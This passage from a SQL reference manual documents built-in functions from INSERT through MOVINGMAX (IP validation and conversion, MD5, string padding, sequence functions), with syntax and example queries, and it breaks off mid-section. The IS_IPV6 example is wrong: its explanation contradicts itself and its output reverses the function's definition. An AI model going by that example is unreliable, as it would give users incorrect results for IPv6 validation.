extension.\r\n\r\n```\r\nINSERT (char-expr-1, start, length, char-expr-2)\r\n```\r\n\r\n* `_char-expr-1_, _char-expr-2_`\r\n+\r\nare SQL character value expressions (of data type CHAR or VARCHAR) that\r\nspecify two strings of characters. The character string _char-expr-2_ is\r\ninserted into the character string_char-expr-1_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start_`\r\n+\r\nspecifies the starting position start within char-expr-1 at which to\r\nstart deleting length number of characters. after the deletion, the\r\ncharacter string char-expr-2 is inserted into the character string\r\n char-expr-1 , beginning at the start position specified by the number\r\n start . The number start must be a value greater than zero of exact\r\nnumeric data type and with a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to delete from _char-expr-1_. The\r\nnumber _length_ must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero. _length_ must be less than\r\nor equal to the length of _char-expr-1_.\r\n\r\n[[examples_of_insert]]\r\n=== Examples of INSERT\r\n\r\n* Suppose that your JOB table includes an entry for a sales\r\nrepresentative. 
Use the INSERT function to change SALESREP to SALES REP:\r\n+\r\n```\r\nUPDATE persnl.job\r\nSET jobdesc = INSERT (jobdesc, 6, 3, ' REP')\r\nWHERE jobdesc = 'SALESREP';\r\n```\r\n+\r\nNow check the row you updated:\r\n+\r\n```\r\nSELECT jobdesc FROM persnl.job WHERE jobdesc = 'SALES REP';\r\n\r\nJob Description\r\n------------------\r\nSALES REP\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[is_ipv4_function]]\r\n== IS_IPV4 Function\r\n\r\nFor a given argument, if it is a valid IPV4 string, IS_IPV4() returns 1 else returns 0. \r\n```\r\nIS_IPV4( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV4 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_is_ipv4]]\r\n=== Examples of IS_IPV4\r\n\r\nThis function returns 1 for the first input argument, since it is a valid IPV4 string; \r\n0 for the second input argument, since it is an invalid IPV4 string.\r\n\r\n```\r\n>>SELECT IS_IPV4('10.0.5.9'), IS_IPV4('10.0.5.256') from dual;\r\n\r\n(EXPR) (EXPR)\r\n------- -------\r\n1 0\r\n```\r\n<<<\r\n[[is_ipv6_function]]\r\n== IS_IPV6 Function\r\n\r\nReturns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise. \r\nThis function does not consider IPv4 addresses to be valid IPv6 addresses.\r\n\r\n```\r\nIS_IPV6( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV6 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_is_ipv6]]\r\n=== Examples of IS_IPV6\r\n\r\nThis function returns 0 for the second input argument, since it is a valid IPV6 string; \r\n1 for the second input argument, since it is an invalid IPVr6 string.\r\n\r\n```\r\n>>SELECT IS_IPV6('10.0.5.9'), IS_IPV6('::1') from dual;\r\n(EXPR) (EXPR)\r\n-------- -------\r\n1 0\r\n```\r\n<<<\r\n +[[inet_aton_function]]\r\n +== INET_ATON Function\r\n +\r\n +Given the dotted-quad representation of an IPv4 network address as a string, \r\n +returns an integer that represents the numeric value of the address in network \r\n +byte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n +\r\n +```\r\n +INET_ATON( expression )\r\n +```\r\n +\r\n +* `_expression_`\r\n ++\r\n +specifies an expression that determines the values to include in the\r\n +conversion of the IP address. The _expression_ cannot contain an aggregate\r\n +function or a subquery. If the input value is NULL, INET_ATON returns NULL.\r\n +See <<expressions,Expressions>>.\r\n +\r\n +[[examples_of_inet_aton]]\r\n +=== Examples of INET_ATON\r\n +\r\n +\r\n +```\r\n +>>SELECT INET_ATON('10.0.5.9') from dual;\r\n +\r\n +(EXPR)\r\n +-----------\r\n +167773449 \r\n +```\r\n +<<<\r\n +[[inet_ntoa_function]]\r\n +== INET_NTOA Function\r\n +\r\n +Given a numeric IPv4 network address in network byte order, returns the \r\n +dotted-quad string representation of the address as a nonbinary string in \r\n +the connection character set. 
INET_NTOA() returns NULL if it does \r\n +not understand its argument.\r\n +\r\n +```\r\n +INET_NTOA( expression )\r\n +```\r\n +\r\n +* `_expression_`\r\n ++\r\n +specifies an expression that determines the values to include in the\r\n +conversion of the number to IP address. The _expression_ cannot contain \r\n +an aggregate function or a subquery. If the input value is NULL, INET_NTOA \r\n +returns NULL. \r\n +See <<expressions,Expressions>>.\r\n +\r\n +[[examples_of_inet_ntoa]]\r\n +=== Examples of INET_NTOA\r\n +\r\n +this function will convert an integer into the dotted-quad string \r\n +representation of the IP address.\r\n +\r\n +```\r\n +>>SELECT INET_NTOA(167773449) from dual\r\n +\r\n +(EXPR)\r\n +-------------\r\n +'10.0.5.9'\r\n +```\r\n +<<<\r\n[[isnull_function]]\r\n== ISNULL Function\r\n\r\nThe ISNULL function returns the value of the first argument if it is not\r\nnull, otherwise it returns the value of the second argument. Both\r\nexpressions must be of comparable types.\r\n\r\nISNULL is a {project-name} SQL extension.\r\n\r\n```\r\nISNULL(ck-expr, repl-value)\r\n```\r\n\r\n* `_ck-expr_`\r\n+\r\nan expression of any valid SQL data type.\r\n\r\n* `_repl-value_`\r\n+\r\nan expression of any valid SQL data type, but must be a comparable type\r\nwith that of _ck-expr_.\r\n\r\n[[examples_of_isnull]]\r\n=== Examples of ISNULL\r\n\r\n* This function returns a 0 instead of a null if value is null.\r\n+\r\n```\r\nISNULL(value,0)\r\n```\r\n\r\n* This function returns the date constant if date_col is null.\r\n+\r\n```\r\nISNULL(date_col, DATE '2006-01-01')\r\n```\r\n\r\n* This function returns 'Smith' if the string column last_name is null.\r\n+\r\n```\r\nISNULL(last_name, 'Smith')\r\n```\r\n\r\n<<<\r\n[[juliantimestamp_function]]\r\n== JULIANTIMESTAMP Function\r\n\r\nThe JULIANTIMESTAMP function converts a datetime value into a 64-bit\r\nJulian timestamp value that represents the number of microseconds that\r\nhave elapsed between 4713 B.C., January 1, 00:00, and the specified\r\ndatetime value. JULIANTIMESTAMP returns a value of data type LARGEINT.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nJULIANTIMESTAMP is a {project-name} SQL extension.\r\n\r\n```\r\nJULIANTIMESTAMP(datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a value of type DATE, TIME, or\r\nTIMESTAMP. If _datetime-expression_ does not contain all the fields from YEAR through\r\nSECOND, {project-name} SQL extends the value before converting it to a Julian\r\ntimestamp. Datetime fields to the left of the specified datetime value\r\nare set to current date fields. Datetime fields to the right of the\r\nspecified datetime value are set to zero. 
See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_juliantimestamp]]\r\n=== Considerations for JULIANTIMESTAMP\r\n\r\nThe _datetime-expression_ value must be a date or timestamp value from\r\nthe beginning of year 0001 to the end of year 9999.\r\n\r\n[[examples_of_juliantimestamp]]\r\n=== Examples of JULIANTIMESTAMP\r\n\r\nThe project table consists of five columns using the data types NUMERIC,\r\nVARCHAR, DATE, TIMESTAMP, and INTERVAL.\r\n\r\n* Convert the TIMESTAMP value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT ship_timestamp, JULIANTIMESTAMP (ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSHIP_TIMESTAMP (EXPR)\r\n-------------------------- --------------------\r\n2008-04-21 08:15:00.000000 212075525700000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Convert the DATE value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT start_date, JULIANTIMESTAMP (start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSTART_DATE (EXPR)\r\n---------- --------------------\r\n2008-04-10 212074545600000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lastnotnull_function]]\r\n== LASTNOTNULL Function\r\n\r\nThe LASTNOTNULL function is a sequence function that returns the last\r\nnon-null value of a column in an intermediate result table ordered by a\r\nSEQUENCE BY clause in a SELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nLASTNOTNULL is a {project-name} SQL extension.\r\n\r\n```\r\nLASTNOTNULL(column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If only null values have been returned, LASTNOTNULL returns null.\r\n\r\n[[examples_of_lastnotnull]]\r\n=== Examples of LASTNOTNULL\r\n\r\n* Return the last non-null value of a column:\r\n+\r\n\r\n```\r\nSELECT LASTNOTNULL(I1) AS lastnotnull\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nlastnotnull\r\n-----------\r\n 6215\r\n 6215\r\n 19058\r\n 19058\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lcase_function]]\r\n== LCASE Function\r\n\r\nThe LCASE function down-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, LCASE returns the same character. LCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the LCASE function is equal to\r\nthe result returned by the <<lower_function,LOWER Function>>.\r\n\r\nLCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nLCASE is a {project-name} SQL extension.\r\n\r\n```\r\nLCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to down-shift. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_lcase]]\r\n=== Examples of LCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n--------------- --------------------- ------------------\r\n... ... 
...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<ucase_function,UCASE Function>>.\r\n\r\n<<<\r\n[[left_function]]\r\n=== LEFT Function\r\n\r\nThe LEFT function returns the leftmost specified number of characters\r\nfrom a character expression. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nLEFT is a {project-name} SQL extension.\r\n\r\n```\r\nLEFT (character-expr, count)\r\n```\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the leftmost specified\r\nnumber of characters. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of characters to return from _character-expr_.\r\nThe number count must be a value of exact numeric data type greater\r\nthan or equal to 0 with a scale of zero.\r\n\r\n[[examples_of_left]]\r\n=== Examples of LEFT\r\n\r\n* Return_'robert':\r\n+\r\n```\r\nleft('robert john smith', 6)\r\n```\r\n\r\n* Use the LEFT function to append the company name to the job\r\ndescriptions:\r\n+\r\n```\r\nUPDATE persnl.job SET jobdesc = LEFT (jobdesc, 11) ||' COMNET';\r\n\r\nSELECT jobdesc FROM persnl.job;\r\n\r\nJob Description\r\n------------------\r\nMANAGER COMNET\r\nPRODUCTION COMNET\r\nASSEMBLER COMNET\r\nSALESREP COMNET\r\nSYSTEM ANAL COMNET\r\nENGINEER COMNET\r\nPROGRAMMER COMNET\r\nACCOUNTANT COMNET\r\nADMINISTRAT COMNET\r\nSECRETARY COMNET\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[locate_function]]\r\n== LOCATE Function\r\n\r\nThe LOCATE function searches for a given substring in a character\r\nstring. If the substring is found, {project-name} SQL returns the character\r\nposition of the substring within the string. Every character, including\r\nmulti-byte characters, is treated as one character. The result returned\r\nby the LOCATE function is equal to the result returned by the\r\n<<position_function,Position Function>>.\r\n\r\nLOCATE is a {project-name} SQL extension.\r\n\r\n```\r\nLOCATE(substring-expression,source-expression)\r\n```\r\n\r\n* `_substring-expression_`\r\n+\r\nis an SQL character value expression that specifies the substring to\r\nsearch for in _source-expression_. The _substring-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_source-expression_`\r\n+\r\nis an SQL character value expression that specifies the source string.\r\nthe _source-expression_ cannot be null.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n{project-name} SQL returns the result as a 2-byte signed integer with a scale\r\nof zero. 
[[considerations_for_locate]]
=== Considerations for LOCATE

[[result_of_locate]]
==== Result of LOCATE

* If the length of _source-expression_ is zero and the length of
_substring-expression_ is greater than zero, {project-name} SQL returns 0.
* If the length of _substring-expression_ is zero, {project-name} SQL returns 1.
* If the length of _substring-expression_ is greater than the length of
_source-expression_, {project-name} SQL returns 0.
* If _source-expression_ is a null value, {project-name} SQL returns a null value.

[[using_ucase]]
==== Using UCASE

To ignore case in the search, use the UCASE function (or the LCASE
function) for both the _substring-expression_ and the _source-expression_.

[[examples_of_locate]]
=== Examples of LOCATE

* Return the value 8 for the position of the substring 'John' within the string:
+
```
LOCATE ('John','Robert John Smith')
```

* Suppose that the EMPLOYEE table has an EMPNAME column that contains
both the first and last names. This SELECT statement returns all records
in table EMPLOYEE that contain the substring 'SMITH', regardless of
whether the column value is in uppercase or lowercase characters:
+
```
SELECT * FROM persnl.employee
WHERE LOCATE ('SMITH',UCASE(empname)) > 0 ;
```

<<<
[[log_function]]
== LOG Function

The LOG function returns the natural logarithm of a numeric value
expression. LOG is a {project-name} SQL extension.

```
LOG (numeric-expression)
```

* `_numeric-expression_`
+
is an SQL numeric value expression that specifies the value for the
argument of the LOG function. The value of the argument must be greater
than zero. See <<numeric_value_expressions,Numeric Value Expressions>>.

[[examples_of_log]]
=== Examples of LOG

* This function returns the value 6.93147180559945344e-001, or
approximately 0.69315:
+
```
LOG (2.0)
```

<<<
[[log10_function]]
== LOG10 Function

The LOG10 function returns the base 10 logarithm of a numeric value
expression.

LOG10 is a {project-name} SQL extension.

```
LOG10 (numeric-expression)
```

* `_numeric-expression_`
+
is an SQL numeric value expression that specifies the value for the
argument of the LOG10 function. The value of the argument must be
greater than zero.
See <<numeric_value_expressions,Numeric Value Expressions>>.

[[examples_of_log10]]
=== Examples of LOG10

* This function returns the value 1.39794000867203776E+000, or
approximately 1.3979:
+
```
LOG10 (25)
```
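* Because LOG10 (_x_) equals LOG (_x_) divided by LOG (10), this quick
sketch also evaluates to approximately 1.3979:
+
```
LOG (25) / LOG (10)
```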
<<<
[[lower_function]]
== LOWER Function

The LOWER function down-shifts alphanumeric characters. For
non-alphanumeric characters, LOWER returns the same character. LOWER can
appear anywhere in a query where a value can be used, such as in a
select list, an ON clause, a WHERE clause, a HAVING clause, a LIKE
predicate, an expression, or as qualifying a new value in an UPDATE or
INSERT statement. The result returned by the LOWER function is equal to
the result returned by the <<lcase_function,LCASE Function>>.

LOWER returns a string of fixed-length or variable-length character
data, depending on the data type of the input string.

```
LOWER (character-expression)
```

* `_character-expression_`
+
is an SQL character value expression that specifies a string of
characters to down-shift.
See <<character_value_expressions,Character Value Expressions>>.

[[considerations_for_lower]]
=== Considerations for LOWER

For a UTF8 character expression, the LOWER function down-shifts all the
uppercase or title case characters in a given string to lowercase and
returns a character string with the same data type and character set as
the argument.

A lowercase character is a character that has the "alphabetic" property
in the Unicode Standard 2 and whose Unicode name includes _lower_. An uppercase
character is a character that has the "alphabetic" property in the
Unicode Standard 2 and whose Unicode name includes _upper_. A title
case character is a character that has the Unicode "alphabetic" property
and whose Unicode name includes _title_.

<<<
[[examples_of_lower]]
=== Examples of LOWER

* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.
Select the column CUSTNAME and return the result in uppercase and
lowercase letters by using the UPPER and LOWER functions:
+
```
SELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;

(EXPR) (EXPR) (EXPR)
----------------- ------------------- ---------------------
... ... ...
Hotel Oregon HOTEL OREGON hotel oregon

--- 17 row(s) selected.
```

See <<upper_function,UPPER Function>>.

<<<
[[lpad_function]]
== LPAD Function

The LPAD function pads the left side of a string with the specified
string. Every character in the string, including multi-byte characters,
is treated as one character.

LPAD is a {project-name} SQL extension.

```
LPAD (str, len [, padstr])
```

* `_str_`
+
can be an expression.
See <<character_value_expressions,Character Value Expressions>>.

* `_len_`
+
identifies the desired number of characters to be returned and can be an
expression but must be an integral value. If _len_ is equal to the
length of the string, no change is made. If _len_ is smaller than the
string size, the string is truncated.

* `_padstr_`
+
can be an expression and may be a string. If _padstr_ is omitted, the
string is padded with spaces.

[[examples_of_lpad]]
=== Examples of LPAD

* This function returns '   kite':
+
```
LPAD('kite', 7)
```

* This function returns 'ki':
+
```
LPAD('kite', 2)
```

* This function returns '0000kite':
+
```
LPAD('kite', 8, '0')
```

* This function returns 'go fly a kite':
+
```
LPAD('go fly a kite', 13, 'z')
```

* This function returns 'John,John,go fly a kite':
+
```
LPAD('go fly a kite', 23, 'John,')
```

<<<
[[ltrim_function]]
== LTRIM Function

The LTRIM function removes leading spaces from a character string. If
you must remove any leading character other than space, use the TRIM
function and specify the value of the character.
See the <<trim_function,TRIM Function>>.
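For example, this minimal sketch uses TRIM to remove a leading character
other than space, returning '123' (the literal is illustrative only):

```
TRIM (LEADING '0' FROM '00123')
```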
LTRIM is a {project-name} SQL extension.

```
LTRIM (character-expression)
```

* `_character-expression_`
+
is an SQL character value expression and specifies the string from which
to trim leading spaces.
See <<character_value_expressions,Character Value Expressions>>.

[[considerations_for_ltrim]]
=== Considerations for LTRIM

[[result_of_ltrim]]
==== Result of LTRIM

The result is always of type VARCHAR, with maximum length equal to the
fixed length or maximum variable length of _character-expression_.

[[examples_of_ltrim]]
=== Examples of LTRIM

* Return 'Robert ':
+
```
LTRIM (' Robert ')
```

See <<trim_function,TRIM Function>> and <<rtrim_function,RTRIM Function>>.

<<<
[[max_function]]
== MAX/MAXIMUM Function

MAX is an aggregate function that returns the maximum value within a set
of values. MAXIMUM is the equivalent of MAX wherever the function name
MAX appears within a statement. The data type of the result is the same
as the data type of the argument.

```
MAX | MAXIMUM ([ALL | DISTINCT] expression)
```

* `ALL | DISTINCT`
+
specifies whether duplicate values are included in the computation of
the maximum of the _expression_. The default option is ALL, which
causes duplicate values to be included. If you specify DISTINCT,
duplicate values are eliminated before the MAX/MAXIMUM function is
applied.

* `_expression_`
+
specifies an expression that determines the values to include in the
computation of the maximum. The _expression_ cannot contain an aggregate
function or a subquery. The DISTINCT clause specifies that the
MAX/MAXIMUM function operates on distinct values from the one-column
table derived from the evaluation of _expression_. All nulls are
eliminated before the function is applied to the set of values. If the
result table is empty, MAX/MAXIMUM returns NULL.
See <<expressions,Expressions>>.

[[considerations_for_max]]
=== Considerations for MAX/MAXIMUM

[[operands_of_the_expression]]
==== Operands of the Expression

The expression includes columns from the rows of the SELECT result table
but cannot include an aggregate function. These expressions are valid:

```
MAX (SALARY)
MAX (SALARY * 1.1)
MAX (PARTCOST * QTY_ORDERED)
```

[[examples_of_max]]
=== Examples of MAX/MAXIMUM

* Display the maximum value in the SALARY column:
+
```
SELECT MAX (salary) FROM persnl.employee;

(EXPR)
-----------
 175500.00

--- 1 row(s) selected.
```
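* MAX also operates per group when the query contains a GROUP BY clause.
This is a hedged sketch; the DEPTNUM grouping column is assumed to exist
in the sample table:
+
```
SELECT deptnum, MAX (salary)
FROM persnl.employee
GROUP BY deptnum;
```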
<<<
[[md5_function]]
== MD5 Function

The MD5 function calculates an MD5 128-bit checksum for the string. The
value is returned as a string of 32 hexadecimal digits, or NULL if the
argument was NULL.

```
MD5 (expression)
```

* `_expression_`
+
specifies an expression that determines the values to include in the
computation of the MD5 checksum. The _expression_ cannot contain an
aggregate function or a subquery. If the input value is NULL, MD5
returns NULL.
See <<expressions,Expressions>>.

[[examples_of_md5]]
=== Examples of MD5

The return value is a nonbinary string in the connection character set.

```
>>SELECT MD5('testing') from dual;

(EXPR)
---------------------------------
'ae2b1fca515949e5d54fb22b8ed95575'
```

<<<
[[min_function]]
== MIN Function

MIN is an aggregate function that returns the minimum value within a set
of values. The data type of the result is the same as the data type of
the argument.

```
MIN ([ALL | DISTINCT] expression)
```

* `ALL | DISTINCT`
+
specifies whether duplicate values are included in the computation of
the minimum of the _expression_. The default option is ALL, which
causes duplicate values to be included. If you specify DISTINCT,
duplicate values are eliminated before the MIN function is applied.

* `_expression_`
+
specifies an expression that determines the values to include in the
computation of the minimum. The _expression_ cannot contain an aggregate
function or a subquery. The DISTINCT clause specifies that the MIN
function operates on distinct values from the one-column table derived
from the evaluation of _expression_. All nulls are eliminated before
the function is applied to the set of values. If the result table is
empty, MIN returns NULL.
See <<expressions,Expressions>>.

[[considerations_for_min]]
=== Considerations for MIN

[[operands_of_the_expression_3]]
==== Operands of the Expression

The expression includes columns from the rows of the SELECT result table
but cannot include an aggregate function. These expressions are valid:

```
MIN (SALARY)
MIN (SALARY * 1.1)
MIN (PARTCOST * QTY_ORDERED)
```

<<<
[[examples_of_min]]
=== Examples of MIN

* Display the minimum value in the SALARY column:
+
```
SELECT MIN (salary) FROM persnl.employee;

(EXPR)
-----------
 17000.00

--- 1 row(s) selected.
```

<<<
[[minute_function]]
== MINUTE Function

The MINUTE function converts a TIME or TIMESTAMP expression into an
INTEGER value, in the range 0 through 59, that represents the
corresponding minute of the hour.

MINUTE is a {project-name} SQL extension.

```
MINUTE (datetime-expression)
```

* `_datetime-expression_`
+
is an expression that evaluates to a datetime value of type TIME or
TIMESTAMP.
See <<datetime_value_expressions,Datetime Value Expressions>>.

[[examples_of_minute]]
=== Examples of MINUTE

* Return an integer that represents the minute of the hour from the
ship timestamp column in the project table:
+
```
SELECT start_date, ship_timestamp, MINUTE(ship_timestamp)
FROM persnl.project
WHERE projcode = 1000;

Start/Date Time/Shipped (EXPR)
---------- -------------------------- ------
2008-04-10 2008-04-21 08:15:00.000000 15
```

<<<
[[mod_function]]
== MOD Function

The MOD function returns the remainder (modulus) of an integer value
expression divided by an integer value expression.

MOD is a {project-name} SQL extension.

```
MOD (integer-expression-1,integer-expression-2)
```

* `_integer-expression-1_`
+
is an SQL numeric value expression of data type SMALLINT, INTEGER, or
LARGEINT that specifies the value for the dividend argument of the MOD
function.

* `_integer-expression-2_`
+
is an SQL numeric value expression of data type SMALLINT, INTEGER, or
LARGEINT that specifies the value for the divisor argument of the MOD
function. The divisor argument cannot be zero.
See <<numeric_value_expressions,Numeric Value Expressions>>.

[[examples_of_mod]]
=== Examples of MOD

* This function returns the value 2 as the remainder or modulus:
+
```
MOD(11,3)
```

<<<
[[month_function]]
== MONTH Function

The MONTH function converts a DATE or TIMESTAMP expression into an
INTEGER value in the range 1 through 12 that represents the
corresponding month of the year.

MONTH is a {project-name} SQL extension.

```
MONTH (datetime-expression)
```

* `_datetime-expression_`
+
is an expression that evaluates to a datetime value of type DATE or
TIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.

[[examples_of_month]]
=== Examples of MONTH

* Return an integer that represents the month of the year from the
start date column in the project table:
+
```
SELECT start_date, ship_timestamp, MONTH(start_date) FROM persnl.project
WHERE projcode = 1000;

Start/Date Time/Shipped (EXPR)
---------- -------------------------- ------
2008-04-10 2008-04-21 08:15:00.000000 4
```
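* The datetime functions can be combined in one select list. As a brief
sketch using the same sample row, this query returns 4, 2, and 15 (see
the QUARTER and MINUTE functions described in this section):
+
```
SELECT MONTH(start_date), QUARTER(start_date), MINUTE(ship_timestamp)
FROM persnl.project
WHERE projcode = 1000;
```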
<<<
[[monthname_function]]
== MONTHNAME Function

The MONTHNAME function converts a DATE or TIMESTAMP expression into a
character literal that is the name of the month of the year (January,
February, and so on).

MONTHNAME is a {project-name} SQL extension.

```
MONTHNAME (datetime-expression)
```

* `_datetime-expression_`
+
is an expression that evaluates to a datetime value of type DATE or
TIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.

[[considerations_for_monthname]]
=== Considerations for MONTHNAME

The MONTHNAME function returns the name of the month in ISO8859-1.

[[examples_of_monthname]]
=== Examples of MONTHNAME

* Return a character literal that is the month of the year from the
start date column in the project table:
+
```
SELECT start_date, ship_timestamp, MONTHNAME(start_date)
FROM persnl.project
WHERE projcode = 1000;

Start/Date Time/Shipped (EXPR)
---------- -------------------------- ---------
2008-04-10 2008-04-21 08:15:00.000000 April
```

<<<
[[movingavg_function]]
== MOVINGAVG Function

The MOVINGAVG function is a sequence function that returns the average
of non-null values of a column in the current window of an intermediate
result table ordered by a SEQUENCE BY clause in a SELECT statement. See
<<sequence_by_clause,SEQUENCE BY Clause>>.

MOVINGAVG is a {project-name} SQL extension.

```
MOVINGAVG(column-expression, integer-expression [, max-rows])
```

* `_column-expression_`
+
specifies a derived column determined by the evaluation of the column
expression.

* `_integer-expression_`
+
is an SQL numeric value expression of signed data type SMALLINT or
INTEGER that specifies the current window. The current window is defined
as the current row and the previous (_integer-expression_ - 1) rows.

* `_max-rows_`
+
is an SQL numeric value expression of signed data type SMALLINT or
INTEGER that specifies the maximum number of rows in the current window.

Note these considerations for the window size:

* The actual value for the window size is the minimum of
_integer-expression_ and _max-rows_.
* If these conditions are met, MOVINGAVG returns the same result as
RUNNINGAVG:
** The _integer-expression_ is out of range, and _max-rows_ is not
specified. This condition includes the case in which both
_integer-expression_ and _max-rows_ are larger than the result table.
** The minimum of _integer-expression_ and _max-rows_ is out of range.
In this case, _integer-expression_ could be within range, but _max-rows_
might be the minimum value of the two and be out of range (for example,
a negative number).
* The number of rows is out of range if it is larger than the size of
the result table, negative, or NULL.

<<<
[[examples_of_movingavg]]
=== Examples of MOVINGAVG

* Return the average of non-null values of a column in the current window
of three rows:
+
```
CREATE TABLE db.mining.seqfcn (I1 INTEGER, ts TIMESTAMP);

SELECT MOVINGAVG (I1,3) AS MOVINGAVG3
FROM mining.seqfcn SEQUENCE BY ts;

I1 TS
6215 TIMESTAMP '1950-03-05 08:32:09'
28174 TIMESTAMP '1951-02-15 14:35:49'
null TIMESTAMP '1955-05-18 08:40:10'
4597 TIMESTAMP '1960-09-19 14:40:39'
11966 TIMESTAMP '1964-05-01 16:41:02'

MOVINGAVG3
---------------------
 6215
 17194
 17194
 16385
 8281

--- 5 row(s) selected.
```

<<<
[[movingcount_function]]
== MOVINGCOUNT Function

The MOVINGCOUNT function is a sequence function that returns the number
of non-null values of a column in the current window of an intermediate
result table ordered by a SEQUENCE BY clause in a SELECT statement.
See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGCOUNT (column-expression, integer-expression [, max-rows])\r\n```\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGCOUNT returns the same result as\r\nRUNNINGCOUNT:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[considerations_for_movingcount]]\r\n=== Considerations for MOVINGCOUNT\r\n\r\nThe MOVINGCOUNT sequence function is defined differently from the COUNT\r\naggregate function. If you specify DISTINCT for the COUNT aggregate\r\nfunction, duplicate values are eliminated before COUNT is applied. You\r\ncannot specify DISTINCT for the MOVINGCOUNT sequence function; duplicate\r\nvalues are counted.\r\n\r\n[[examples_of_movingcount]]\r\n=== Examples of MOVINGCOUNT\r\n\r\n* Return the number of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGCOUNT (I1,3) AS MOVINGCOUNT3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGCOUNT3\r\n------------\r\n 1\r\n 2\r\n 2\r\n 2\r\n 2\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmax_function]]\r\n== MOVINGMAX Function\r\n\r\nThe MOVINGMAX function is a sequence function that returns the maximum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMAX (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. 
